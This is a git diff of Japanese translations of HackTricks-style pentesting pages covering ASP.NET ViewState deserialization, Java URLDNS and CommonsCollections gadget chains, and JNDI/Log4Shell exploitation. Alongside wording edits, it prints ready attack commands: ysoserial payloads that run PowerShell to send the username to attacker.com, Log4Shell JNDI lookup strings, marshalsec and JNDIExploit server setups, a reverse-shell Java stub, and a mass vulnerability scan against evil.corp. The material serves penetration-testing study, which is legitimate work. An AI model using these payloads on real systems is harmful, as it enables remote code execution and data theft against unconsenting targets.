+4. **4.5以上のバージョン**の場合、MACと暗号化のすべての組み合わせ（両方がtrue、または一方がtrueで他方がfalseの場合）はMachineKeyを必要とします。MachineKeyは「Blacklist3r」を使用して特定できます。
 
 ### テストケース: 1 – EnableViewStateMac=false および viewStateEncryptionMode=false
 
@@ -36,15 +36,15 @@ BurpSuiteを使用して、このパラメータを含むリクエストをキ
 ```
 ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName"
 ```
-### テストケース 1.5 – テストケース 1 と同様だが、ViewState クッキーはサーバーによって送信されない
+### テストケース 1.5 – テストケース 1 と同様ですが、ViewState クッキーはサーバーによって送信されません
 
-開発者は **ViewState** を HTTP リクエストの一部として送信されないようにすることができます（ユーザーはこのクッキーを受け取らない）。\
-**ViewState** が **存在しない** 場合、その実装は **ViewState デシリアライズに起因する潜在的な脆弱性から安全である** と考えるかもしれません。\
+開発者は **ViewState** を HTTP リクエストの一部として送信しないようにすることができます（ユーザーはこのクッキーを受け取りません）。\
+**ViewState** が **存在しない** 場合、その実装は **ViewState デシリアライズ** に起因する潜在的な脆弱性から **安全** であると考えるかもしれません。\
 しかし、それは事実ではありません。リクエストボディに **ViewState パラメータ** を追加し、ysoserial を使用して作成したシリアライズされたペイロードを送信すれば、**ケース 1** に示されているように **コード実行** を達成することができます。
 
 ### テストケース: 2 – .Net < 4.5 および EnableViewStateMac=true & ViewStateEncryptionMode=false
 
-特定のページに対して **ViewState MAC** を **有効にする** ためには、特定の aspx ファイルに以下の変更を加える必要があります:
+特定のページに対して **ViewState MAC** を **有効** にするためには、特定の aspx ファイルに以下の変更を加える必要があります:
 ```bash
 <%@ Page Language="C#" AutoEventWireup="true" CodeFile="hello.aspx.cs" Inherits="hello" enableViewStateMac="True"%>
 ```
@@ -68,7 +68,7 @@ AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata /wEPDwUKLTkyMTY0M
 --encrypteddata : __VIEWSTATE parameter value of the target application
 --modifier : __VIWESTATEGENERATOR parameter value
 ```
-[**Badsecrets**](https://github.com/blacklanternsecurity/badsecrets) は、既知の machineKeys を特定できる別のツールです。Python で書かれているため、Blacklist3r とは異なり、Windows 依存性はありません。.NET viewstates 用に、「python blacklist3r」ユーティリティがあり、これが最も迅速な使用方法です。
+[**Badsecrets**](https://github.com/blacklanternsecurity/badsecrets) は、既知の machineKeys を特定できる別のツールです。これは Python で書かれているため、Blacklist3r とは異なり、Windows 依存性はありません。.NET viewstates 用に、「python blacklist3r」ユーティリティがあり、これが最も迅速な使用方法です。
 
 viewstate と generator を直接提供することができます:
 ```
@@ -79,7 +79,7 @@ python examples/blacklist3r.py --viewstate /wEPDwUJODExMDE5NzY5ZGQMKS6jehX5HkJgX
 ```
 ![https://user-images.githubusercontent.com/24899338/227034640-662b6aad-f8b9-49e4-9a6b-62a5f6ae2d60.png](https://user-images.githubusercontent.com/24899338/227034640-662b6aad-f8b9-49e4-9a6b-62a5f6ae2d60.png)
 
-または、ターゲットURLに直接接続し、HTMLからviewstateを抽出しようとすることができます:
+または、ターゲットURLに直接接続し、HTMLからviewstateを切り出そうとすることができます:
 ```
 pip install badsecrets
 git clone https://github.com/blacklanternsecurity/badsecrets
@@ -88,7 +88,7 @@ python examples/blacklist3r.py --url http://vulnerablesite/vulnerablepage.aspx
 ```
 ![https://user-images.githubusercontent.com/24899338/227034654-e8ad9648-6c0e-47cb-a873-bf97623a0089.png](https://user-images.githubusercontent.com/24899338/227034654-e8ad9648-6c0e-47cb-a873-bf97623a0089.png)
 
-脆弱な viewstate を大規模に検索するために、サブドメイン列挙と組み合わせて、`badsecrets` [**BBOT**](exploiting-__viewstate-parameter.md) モジュールを使用できます：
+脆弱なviewstateを大規模に検索するために、サブドメイン列挙と組み合わせて、`badsecrets` [**BBOT**](exploiting-__viewstate-parameter.md) モジュールを使用できます：
 ```
 bbot -f subdomain-enum -m badsecrets -t evil.corp
 ```
@@ -106,15 +106,15 @@ ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe Inv
 ```
 ### テストケース: 3 – .Net < 4.5 および EnableViewStateMac=true/false および ViewStateEncryptionMode=true
 
-この場合、パラメータがMACで保護されているかどうかは不明です。そのため、値はおそらく暗号化されており、**脆弱性を悪用するためにペイロードを暗号化するためのMachine Keyが必要です**。
+この場合、パラメータがMACで保護されているかどうかは不明です。そのため、値はおそらく暗号化されており、**脆弱性を悪用するためにペイロードを暗号化するためのマシンキーが必要です**。
 
 **この場合、** [**Blacklist3r**](https://github.com/NotSoSecure/Blacklist3r/tree/master/MachineKey/AspDotNetWrapper) **モジュールは開発中です...**
 
 **.NET 4.5以前では、** ASP.NETは**`ViewStateEncryptionMode`**が_**Always**_に設定されていても、ユーザーからの**暗号化されていない**\_`__VIEWSTATE`\_パラメータを**受け入れることができます**。ASP.NETは**`__VIEWSTATEENCRYPTED`**パラメータの**存在**のみを**チェックします**。**このパラメータを削除し、暗号化されていないペイロードを送信すると、それでも処理されます。**
 
-したがって、攻撃者がファイルトラバーサルのような別の脆弱性を介してMachinekeyを取得する方法を見つけた場合、**ケース2**で使用された[**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net)コマンドを使用してViewStateデシリアライズ脆弱性を利用してRCEを実行できます。
+したがって、攻撃者がファイルトラバーサルのような別の脆弱性を介してマシンキーを取得する方法を見つけた場合、**ケース2**で使用された[**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net)コマンドを使用して、ViewStateのデシリアライズ脆弱性を利用してRCEを実行できます。
 
-- ViewStateデシリアライズ脆弱性を悪用するために、リクエストから`__VIEWSTATEENCRYPTED`パラメータを削除してください。そうしないと、Viewstate MAC検証エラーが返され、悪用は失敗します。
+- ViewStateのデシリアライズ脆弱性を悪用するために、リクエストから`__VIEWSTATEENCRYPTED`パラメータを削除してください。そうしないと、Viewstate MAC検証エラーが返され、悪用は失敗します。
 
 ### テストケース: 4 – .Net >= 4.5 および EnableViewStateMac=true/false および ViewStateEncryptionMode=true/false ただし両方の属性がfalseの場合
 
@@ -153,12 +153,12 @@ ysoserial.exe -p ViewState  -g TextFormattingRunProperties -c "powershell.exe In
 
 ![](https://notsosecure.com/sites/all/assets/group/nss_uploads/2019/06/4.2.png)
 
-ViewStateのデシリアライズ脆弱性の成功した悪用は、攻撃者が制御するサーバーへのアウトオブバンドリクエストを引き起こし、ユーザー名を含みます。この種のエクスプロイトは、「Exploiting ViewState Deserialization using Blacklist3r and YsoSerial.NET」というリソースを通じて見つけることができる概念実証（PoC）で示されています。悪用プロセスの詳細や、MachineKeyを特定するためにBlacklist3rのようなツールを利用する方法については、提供された[成功した悪用のPoC](https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/#PoC)を確認できます。
+ViewStateデシリアライズの脆弱性を成功裏に悪用すると、攻撃者が制御するサーバーへのアウトオブバンドリクエストが発生し、ユーザー名が含まれます。この種のエクスプロイトは、「Exploiting ViewState Deserialization using Blacklist3r and YsoSerial.NET」というリソースを通じて見つけることができる概念実証（PoC）で示されています。エクスプロイトプロセスの詳細や、MachineKeyを特定するためにBlacklist3rのようなツールを利用する方法については、提供された[PoC of Successful Exploitation](https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/#PoC)を確認できます。
 
 ### テストケース 6 – ViewStateUserKeysが使用されている
 
 **ViewStateUserKey**プロパティは、**CSRF攻撃**に対して**防御**するために使用できます。そのようなキーがアプリケーションで定義されている場合、これまでに議論した方法で**ViewState**ペイロードを生成しようとすると、**ペイロードはアプリケーションによって処理されません**。\
-ペイロードを正しく作成するためには、もう1つのパラメータを使用する必要があります：
+ペイロードを正しく作成するために、もう1つのパラメータを使用する必要があります：
 ```bash
 --viewstateuserkey="randomstringdefinedintheserver"
 ```
@@ -166,7 +166,7 @@ ViewStateのデシリアライズ脆弱性の成功した悪用は、攻撃者
 
 すべてのテストケースにおいて、ViewState YSoSerial.Net ペイロードが**成功**した場合、サーバーは「**500 Internal server error**」で応答し、応答内容は「**このページの状態情報は無効であり、破損している可能性があります**」となり、OOB リクエストを取得します。
 
-[さらに詳しい情報はこちらを確認してください](<https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/deserialization/[**https:/www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/**](https:/www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/)/README.md>)
+[さらなる情報はこちらを確認してください](<https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/deserialization/[**https:/www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/**](https:/www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/)/README.md>)
 
 ## 参考文献
 
diff --git a/src/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md b/src/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md
index eeda835ce..b7176e1f4 100644
--- a/src/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md
+++ b/src/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md
@@ -9,7 +9,7 @@
 public final class URL implements java.io.Serializable {
 ```
 このクラスには**奇妙な動作**があります。ドキュメントから：“**2つのホストは、両方のホスト名が同じIPアドレスに解決できる場合、同等と見なされます**”。\
-そのため、URLオブジェクトが**`equals`**または**`hashCode`**の**いずれか**の**関数**を呼び出すたびに、IPアドレスを取得するための**DNSリクエスト**が**送信**されます。
+そのため、URLオブジェクトが**`equals`**または**`hashCode`**の**いずれか**の**関数**を呼び出すたびに、**IPアドレス**を取得するための**DNSリクエスト**が**送信**されます。
 
 **`hashCode`**関数を**URL**オブジェクトから**呼び出す**のは非常に簡単で、このオブジェクトをデシリアライズされる`HashMap`に挿入するだけで済みます。これは、`HashMap`の**`readObject`**関数の**最後**でこのコードが実行されるためです：
 ```java
@@ -21,7 +21,7 @@ for (int i = 0; i < mappings; i++) {
 putVal(hash(key), key, value, false, false);
 }
 ```
-それは`HashMap`内のすべての値で`putVal`を**実行**する**予定です**。しかし、より重要なのは、すべての値で`hash`を呼び出すことです。これは`hash`関数のコードです：
+それは`HashMap`内のすべての値で`putVal`を**実行**します。しかし、より重要なのは、すべての値で`hash`を呼び出すことです。これは`hash`関数のコードです：
 ```java
 static final int hash(Object key) {
 int h;
@@ -53,13 +53,13 @@ h += protocol.hashCode();
 InetAddress addr = getHostAddress(u);
 [   ...   ]
 ```
-`getHostAddress`がドメインに対して実行され、**DNSクエリが発行されます**。
+`getHostAddress`がドメインに対して実行され、**DNSクエリを発行**しています。
 
 したがって、このクラスは**悪用**されて**DNSクエリを発行**し、**デシリアライズ**が可能であることを**示す**ため、または**情報を抽出**するために使用できます（コマンド実行の出力をサブドメインとして追加できます）。
 
 ### URLDNSペイロードコードの例
 
-[ysoserialのURDNSペイロードコードはこちら](https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/URLDNS.java)で見つけることができます。ただし、コーディングを理解しやすくするために、ysoserialのものを基にした独自のPoCを作成しました：
+[ysoserialのURDNSペイロードコードはこちら](https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/URLDNS.java)で見つけることができます。ただし、理解しやすくするために、ysoserialのものを基にした独自のPoCを作成しました：
 ```java
 import java.io.File;
 import java.io.FileInputStream;
@@ -148,7 +148,7 @@ GitHub内には、[**GadgetProbeにはいくつかのワードリスト**](https
 ## Javaデシリアライズスキャナー
 
 このスキャナーはBurp App Store (**Extender**)から**ダウンロード**できます。\
-この**拡張機能**には**パッシブ**およびアクティブな**機能**があります。
+**拡張機能**には**パッシブ**およびアクティブな**機能**があります。
 
 ### パッシブ
 
diff --git a/src/pentesting-web/deserialization/java-transformers-to-rutime-exec-payload.md b/src/pentesting-web/deserialization/java-transformers-to-rutime-exec-payload.md
index e0b6464cf..4e1440fca 100644
--- a/src/pentesting-web/deserialization/java-transformers-to-rutime-exec-payload.md
+++ b/src/pentesting-web/deserialization/java-transformers-to-rutime-exec-payload.md
@@ -42,7 +42,7 @@ lazyMap.get("anything");
 }
 }
 ```
-Javaのデシリアライズペイロードについて何も知らない場合、このコードがなぜcalcを実行するのかを理解するのは難しいかもしれません。
+Javaのデシリアライズペイロードについて何も知らない場合、このコードがどのようにcalcを実行するかを理解するのは難しいかもしれません。
 
 まず第一に、**JavaのTransformer**は**クラスを受け取り**、**別のクラスに変換する**ものであることを知っておく必要があります。\
 また、ここで**実行されているペイロード**は**次のものと同等**であることを知っておくと興味深いです:
@@ -55,7 +55,7 @@ Runtime.getRuntime().exec(new String[]{"calc.exe"});
 ```
 ### どのように
 
-では、最初のペイロードがどのように「シンプル」なワンライナーと同等であるかを見てみましょう。
+では、最初のペイロードがその「シンプルな」ワンライナーと同等である理由は何ですか？
 
 **まず**、ペイロードには**変換のチェーン（配列）が作成されている**ことに気づくことができます：
 ```java
@@ -86,7 +86,7 @@ ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
 ```
 コードを読むと、配列の変換を何らかの方法で連鎖させることができれば、任意のコマンドを実行できることに気付くでしょう。
 
-では、**それらの変換はどのように連鎖するのですか？**
+では、**それらの変換はどのように連鎖させるのですか？**
 ```java
 Map map = new HashMap<>();
 Map lazyMap = LazyMap.decorate(map, chainedTransformer);
@@ -104,7 +104,7 @@ this.factory = factory;
 ```
 そして、素晴らしいフィナーレが実行されます: `lazyMap.get("anything");`
 
-これは `get` 関数のコードです:
+これが `get` 関数のコードです:
 ```java
 public Object get(Object key) {
 if (map.containsKey(key) == false) {
@@ -124,7 +124,7 @@ object = iTransformers[i].transform(object);
 return object;
 }
 ```
-だから、**factory**の中に**`chainedTransformer`**を保存していて、**`transform`**関数の中で**すべてのチェーンされたトランスフォーマーを通過して**、1つずつ実行していることを思い出してください。面白いことに、**各トランスフォーマーは`object`を** **入力**として使用し、**objectは最後に実行されたトランスフォーマーからの出力です**。したがって、**すべての変換は悪意のあるペイロードをチェーン実行しています**。
+だから、**factory**の中に**`chainedTransformer`**を保存していて、**`transform`**関数の中で**すべてのチェーンされたトランスフォーマーを通過して**、1つずつ実行していることを思い出してください。面白いことに、**各トランスフォーマーは`object`を** **入力**として使用し、**objectは最後に実行されたトランスフォーマーからの出力です**。したがって、**すべてのトランスフォームは悪意のあるペイロードをチェーン実行しています**。
 
 ### 概要
 
@@ -153,7 +153,7 @@ command
 ```java
 ((Runtime) (Runtime.class.getMethod("getRuntime").invoke(null))).exec(new String[]{"calc.exe"});
 ```
-ここでは、**ComonsCollections1** ペイロードに使用される **gadgets** が説明されました。しかし、**これがどのように実行されるか** は残されています。 [ここで **ysoserial**](https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java) を見ると、このペイロードを実行するために `AnnotationInvocationHandler` オブジェクトを使用しています。なぜなら、**このオブジェクトがデシリアライズされると**、`payload.get()` 関数を **呼び出す** からであり、**ペイロード全体を実行します**。
+ここでは、**ComonsCollections1** ペイロードに使用される **gadgets** が説明されました。しかし、**これがどのように実行されるか** は残されています。 [ここで **ysoserial**](https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java) を見ると、このペイロードを実行するために `AnnotationInvocationHandler` オブジェクトを使用しています。なぜなら、**このオブジェクトがデシリアライズされると**、`payload.get()` 関数を **呼び出す** からであり、これが **ペイロード全体を実行します**。
 
 ## Java Thread Sleep
 
diff --git a/src/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md b/src/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md
index a7bdd8220..f03e87abe 100644
--- a/src/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md
+++ b/src/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md
@@ -8,7 +8,7 @@ JNDIは1990年代後半からJavaに統合されており、ディレクトリ
 
 ### JNDI命名参照
 
-JavaオブジェクトはJNDI命名参照を使用して保存および取得でき、2つの形式があります：
+JavaオブジェクトはJNDI命名参照を使用して保存および取得でき、これには2つの形式があります：
 
 - **参照アドレス**：オブジェクトの場所を指定します（例：_rmi://server/ref_）、指定されたアドレスから直接取得できます。
 - **リモートファクトリ**：リモートファクトリクラスを参照します。アクセスされると、クラスはリモートの場所からダウンロードされ、インスタンス化されます。
@@ -19,9 +19,9 @@ JavaオブジェクトはJNDI命名参照を使用して保存および取得で
 - **LDAP**：JDK 6u141、7u131、8u121以降、デフォルトで`com.sun.jndi.ldap.object.trustURLCodebase = false`が設定され、リモートで読み込まれたJavaオブジェクトの実行がブロックされます。`true`に設定すると、セキュリティマネージャーの監視なしにリモートコードの実行が可能になります。
 - **CORBA**：特定のプロパティはありませんが、セキュリティマネージャーは常にアクティブです。
 
-しかし、JNDIリンクを解決する責任を持つ**ネーミングマネージャー**には、組み込みのセキュリティメカニズムが欠けており、任意のソースからオブジェクトを取得できる可能性があります。これにより、RMI、LDAP、CORBAの保護が回避され、任意のJavaオブジェクトの読み込みや、悪意のあるコードを実行するために既存のアプリケーションコンポーネント（ガジェット）を悪用するリスクが生じます。
+しかし、JNDIリンクを解決する責任を持つ**Naming Manager**は、組み込みのセキュリティメカニズムが欠如しており、任意のソースからオブジェクトを取得できる可能性があります。これは、RMI、LDAP、CORBAの保護が回避され、任意のJavaオブジェクトの読み込みや、既存のアプリケーションコンポーネント（ガジェット）を悪用して悪意のあるコードを実行するリスクをもたらします。
 
-悪用可能なURLの例：
+悪用可能なURLの例には以下が含まれます：
 
 - _rmi://attacker-server/bar_
 - _ldap://attacker-server/bar_
@@ -33,19 +33,19 @@ JavaオブジェクトはJNDI命名参照を使用して保存および取得で
 
 ![](<../../images/image (1022).png>)
 
-**`PROVIDER_URL`**を設定していても、ルックアップで異なるものを指定でき、アクセスされます：`ctx.lookup("<attacker-controlled-url>")`、これが攻撃者が彼の制御下にあるシステムから任意のオブジェクトを読み込むために悪用するものです。
+**`PROVIDER_URL`**を設定していても、ルックアップで異なるものを指定することができ、アクセスされます：`ctx.lookup("<attacker-controlled-url>")`、これが攻撃者が彼の制御するシステムから任意のオブジェクトを読み込むために悪用するものです。
 
 ### CORBAの概要
 
-CORBA（Common Object Request Broker Architecture）は、リモートオブジェクトを一意に識別するために**相互運用可能なオブジェクト参照（IOR）**を使用します。この参照には、次のような重要な情報が含まれます：
+CORBA（Common Object Request Broker Architecture）は、リモートオブジェクトを一意に識別するために**Interoperable Object Reference (IOR)**を使用します。この参照には、以下のような重要な情報が含まれます：
 
 - **タイプID**：インターフェースの一意の識別子。
 - **コードベース**：スタブクラスを取得するためのURL。
 
-特に、CORBAは本質的に脆弱ではありません。セキュリティを確保するためには通常、次のことが必要です：
+特に、CORBAは本質的に脆弱ではありません。セキュリティを確保するためには通常、以下が必要です：
 
 - **セキュリティマネージャー**のインストール。
-- セキュリティマネージャーを構成して、潜在的に悪意のあるコードベースへの接続を許可します。これは次のように実現できます：
+- セキュリティマネージャーを構成して、潜在的に悪意のあるコードベースへの接続を許可します。これは以下を通じて実現できます：
 - ソケットの権限、例：`permissions java.net.SocketPermission "*:1098-1099", "connect";`。
 - ファイル読み取り権限、普遍的に（`permission java.io.FilePermission "<<ALL FILES>>", "read";`）または悪意のあるファイルが配置される可能性のある特定のディレクトリに対して。
 
@@ -53,13 +53,13 @@ CORBA（Common Object Request Broker Architecture）は、リモートオブジ
 
 ### RMIコンテキスト
 
-RMI（Remote Method Invocation）については、状況がやや異なります。CORBAと同様に、任意のクラスのダウンロードはデフォルトで制限されています。RMIを悪用するには、通常、セキュリティマネージャーを回避する必要があります。これはCORBAでも関連する課題です。
+RMI（Remote Method Invocation）については、状況はやや異なります。CORBAと同様に、任意のクラスのダウンロードはデフォルトで制限されています。RMIを悪用するには、通常、セキュリティマネージャーを回避する必要があります。これはCORBAでも関連する課題です。
 
 ### LDAP
 
 まず、検索とルックアップを区別する必要があります。\
-**検索**は、`ldap://localhost:389/o=JNDITutorial`のようなURLを使用してLDAPサーバーからJNDITutorialオブジェクトを見つけ、その属性を**取得します**。\
-**ルックアップ**は、**名前サービス**のためのもので、**名前にバインドされているものを取得する**ことを目的としています。
+**検索**は、`ldap://localhost:389/o=JNDITutorial`のようなURLを使用してLDAPサーバーからJNDITutorialオブジェクトを見つけ、その**属性を取得**します。\
+**ルックアップ**は、**名前サービス**のためのもので、**名前にバインドされているものを取得**することを目的としています。
 
 LDAP検索が**SearchControls.setReturningObjFlag()を`true`で呼び出された場合、返されたオブジェクトは再構築されます**。
 
@@ -89,7 +89,7 @@ LDAP検索が**SearchControls.setReturningObjFlag()を`true`で呼び出され
 
 キーに**:が存在する**場合、例えば`${jndi:ldap://example.com/a}`では**プレフィックスがなく**、**LDAPサーバーがオブジェクトをクエリします**。これらのルックアップは、Log4jの設定やログが記録される際に使用できます。
 
-したがって、RCEを取得するために必要な唯一のことは、**ユーザーによって制御される情報を処理する脆弱なバージョンのLog4j**です。そして、これはJavaアプリケーションが情報をログに記録するために広く使用されているライブラリであるため（インターネットに接続されたアプリケーションを含む）、HTTPヘッダーのような情報をログに記録するためにlog4jが非常に一般的でした。しかし、log4jは**HTTP情報だけでなく、開発者が示した任意の入力やデータをログに記録するために使用されます**。
+したがって、RCEを取得するために必要な唯一のものは、**ユーザーによって制御される情報を処理する脆弱なバージョンのLog4j**です。そして、これはJavaアプリケーションが情報をログに記録するために広く使用されているライブラリであるため（インターネットに接続されたアプリケーションを含む）、HTTPヘッダーのような情報をログに記録するためにlog4jが非常に一般的でした。しかし、log4jは**HTTP情報だけでなく、開発者が示した任意の入力やデータをログに記録するために使用されます**。
 
 ## Log4Shell関連のCVEの概要
 
@@ -103,15 +103,15 @@ LDAP検索が**SearchControls.setReturningObjFlag()を`true`で呼び出され
 
 ### [CVE-2021-4104](https://nvd.nist.gov/vuln/detail/CVE-2021-4104) **\[High]**
 
-**Log4j 1.xバージョン**に影響を与え、デフォルト以外の構成で`JMSAppender`を使用しているこのCVEは、信頼できないデシリアライズの欠陥です。1.xブランチには修正がなく、サポートが終了しているため、`log4j-core 2.17.0`へのアップグレードが推奨されます。
+**Log4j 1.xバージョン**に影響を与え、`JMSAppender`を使用している非デフォルト構成のこのCVEは、信頼できないデシリアライズの欠陥です。1.xブランチには修正がなく、サポートが終了しているため、`log4j-core 2.17.0`へのアップグレードが推奨されます。
 
 ### [CVE-2021-42550](https://nvd.nist.gov/vuln/detail/CVE-2021-42550) **\[Moderate]**
 
-この脆弱性は、Log4j 1.xの後継である**Logbackロギングフレームワーク**に影響を与えます。以前は安全だと考えられていましたが、このフレームワークは脆弱であることが判明し、問題を解決するために新しいバージョン（1.3.0-alpha11および1.2.9）がリリースされました。
+この脆弱性は、Log4j 1.xの後継である**Logbackロギングフレームワーク**に影響を与えます。以前は安全だと考えられていましたが、フレームワークが脆弱であることが判明し、問題に対処するために新しいバージョン（1.3.0-alpha11および1.2.9）がリリースされました。
 
 ### **CVE-2021-45105** **\[High]**
 
-Log4j 2.16.0にはDoSの欠陥が含まれており、CVEを修正するために`log4j 2.17.0`がリリースされました。詳細はBleepingComputerの[レポート](https://www.bleepingcomputer.com/news/security/upgraded-to-log4j-216-surprise-theres-a-217-fixing-dos/)にあります。
+Log4j 2.16.0にはDoSの欠陥が含まれており、CVEを修正するために`log4j 2.17.0`がリリースされました。詳細はBleepingComputerの[報告](https://www.bleepingcomputer.com/news/security/upgraded-to-log4j-216-surprise-theres-a-217-fixing-dos/)にあります。
 
 ### [CVE-2021-44832](https://checkmarx.com/blog/cve-2021-44832-apache-log4j-2-17-0-arbitrary-code-execution-via-jdbcappender-datasource-element/)
 
@@ -121,7 +121,7 @@ log4jバージョン2.17に影響を与えるこのCVEは、攻撃者がlog4jの
 
 ### 発見
 
-この脆弱性は、保護されていない場合、非常に簡単に発見できます。なぜなら、ペイロードで指定したアドレスに少なくとも**DNSリクエスト**を送信するからです。したがって、次のようなペイロードが考えられます：
+この脆弱性は、保護されていない場合、非常に簡単に発見できます。なぜなら、ペイロードで指定したアドレスに少なくとも**DNSリクエスト**を送信するからです。したがって、以下のようなペイロードが考えられます：
 
 - `${jndi:ldap://x${hostName}.L4J.lt4aev8pktxcq2qlpdr5qu5ya.canarytokens.com/a}`（[canarytokens.com](https://canarytokens.org/generate)を使用）
 - `${jndi:ldap://c72gqsaum5n94mgp67m0c8no4hoyyyyyn.interact.sh}`（[interactsh](https://github.com/projectdiscovery/interactsh)を使用）
@@ -136,7 +136,7 @@ log4jバージョン2.17に影響を与えるこのCVEは、攻撃者がlog4jの
 
 #### **ローカル発見**
 
-次のコマンドで**ローカルの脆弱なバージョン**のライブラリを検索します：
+以下のコマンドで**ローカルの脆弱なバージョン**のライブラリを検索します：
 ```bash
 find / -name "log4j-core*.jar" 2>/dev/null | grep -E "log4j\-core\-(1\.[^0]|2\.[0-9][^0-9]|2\.1[0-6])"
 ```
@@ -205,7 +205,7 @@ Any other env variable name that could store sensitive information
 ### RCE情報
 
 > [!NOTE]
-> JDKバージョン6u141、7u131、または8u121以上で動作しているホストは、LDAPクラスローディング攻撃ベクターから保護されています。これは、`com.sun.jndi.ldap.object.trustURLCodebase`がデフォルトで無効化されているためで、これによりJNDIがLDAPを介してリモートコードベースをロードすることを防ぎます。ただし、これらのバージョンは**デシリアライズ攻撃ベクターに対して保護されていない**ことに注意することが重要です。
+> JDKバージョン6u141、7u131、または8u121以上で動作しているホストは、LDAPクラスローディング攻撃ベクターから保護されています。これは、`com.sun.jndi.ldap.object.trustURLCodebase`がデフォルトで無効化されているためで、これによりJNDIはLDAPを介してリモートコードベースをロードできなくなります。ただし、これらのバージョンは**デシリアライズ攻撃ベクターに対して保護されていない**ことに注意することが重要です。
 >
 > これらの高いJDKバージョンを悪用しようとする攻撃者は、Javaアプリケーション内で**信頼されたガジェット**を利用する必要があります。ysoserialやJNDIExploitのようなツールがこの目的でよく使用されます。一方、低いJDKバージョンを悪用するのは比較的簡単で、これらのバージョンは任意のクラスをロードして実行するように操作できます。
 >
@@ -213,13 +213,13 @@ Any other env variable name that could store sensitive information
 
 ### RCE - Marshalsecとカスタムペイロード
 
-この内容は**THMボックス**でテストできます： [**https://tryhackme.com/room/solar**](https://tryhackme.com/room/solar)
+この内容は**THMボックス**でテストできます：[**https://tryhackme.com/room/solar**](https://tryhackme.com/room/solar)
 
-ツール[**marshalsec**](https://github.com/mbechler/marshalsec)を使用します（jarバージョンは[**こちら**](https://github.com/RandomRobbieBF/marshalsec-jar)で入手可能）。このアプローチは、接続を二次HTTPサーバーにリダイレクトするLDAPリファラルサーバーを確立します。
+ツール[**marshalsec**](https://github.com/mbechler/marshalsec)を使用します（jarバージョンは[**こちら**](https://github.com/RandomRobbieBF/marshalsec-jar)で入手可能です）。このアプローチは、接続を二次HTTPサーバーにリダイレクトするLDAPリファラルサーバーを確立します。
 ```bash
 java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://<your_ip_http_server>:8000/#Exploit"
 ```
-ターゲットにリバースシェルコードをロードさせるために、以下の内容で `Exploit.java` という名前のJavaファイルを作成します:
+ターゲットにリバースシェルコードを読み込ませるために、以下の内容で `Exploit.java` という名前のJavaファイルを作成します:
 ```java
 public class Exploit {
 static {
@@ -254,8 +254,8 @@ wget https://web.archive.org/web/20211210224333/https://github.com/feihong-cs/JN
 unzip JNDIExploit.v1.2.zip
 java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 172.17.0.1 -p 8888 # Use your private IP address and a port where the victim will be able to access
 ```
-コードを数分間読んだ後、_com.feihong.ldap.LdapServer_ と _com.feihong.ldap.HTTPServer_ で **LDAP と HTTP サーバーがどのように作成されるか** がわかります。LDAP サーバーは、どのペイロードを提供する必要があるかを理解し、被害者を HTTP サーバーにリダイレクトします。HTTP サーバーはエクスプロイトを提供します。\
-_com.feihong.ldap.gadgets_ では、目的のアクションを実行するために使用できる **特定のガジェット** を見つけることができます（潜在的に任意のコードを実行する）。_com.feihong.ldap.template_ では、**エクスプロイトを生成する** 異なるテンプレートクラスを見ることができます。
+コードを数分間読むと、_com.feihong.ldap.LdapServer_ と _com.feihong.ldap.HTTPServer_ で **LDAP と HTTP サーバーがどのように作成されるか** がわかります。LDAP サーバーは、どのペイロードを提供する必要があるかを理解し、被害者を HTTP サーバーにリダイレクトします。HTTP サーバーはエクスプロイトを提供します。\
+_com.feihong.ldap.gadgets_ では、**特定のガジェット**が見つかり、目的のアクションを実行するために使用できます（任意のコードを実行する可能性があります）。_com.feihong.ldap.template_ では、**エクスプロイトを生成する**さまざまなテンプレートクラスを見ることができます。
 
 利用可能なすべてのエクスプロイトは **`java -jar JNDIExploit-1.2-SNAPSHOT.jar -u`** で確認できます。いくつかの便利なものは次のとおりです：
 ```bash
@@ -288,7 +288,7 @@ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -L 172.17.0.1:1389 -J 172.
 # Execute command
 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -L 172.17.0.1:1389 -J 172.17.0.1:8888 -C "touch /tmp/log4shell"
 ```
-_この攻撃はカスタム生成されたJavaオブジェクトを使用しており、**THMソーラールーム**のようなラボで機能します。しかし、一般的には機能しません（デフォルトではJavaはLDAPを使用してリモートコードベースをロードするように構成されていないため）これは、信頼されたクラスを悪用して任意のコードを実行していないためだと思います。_
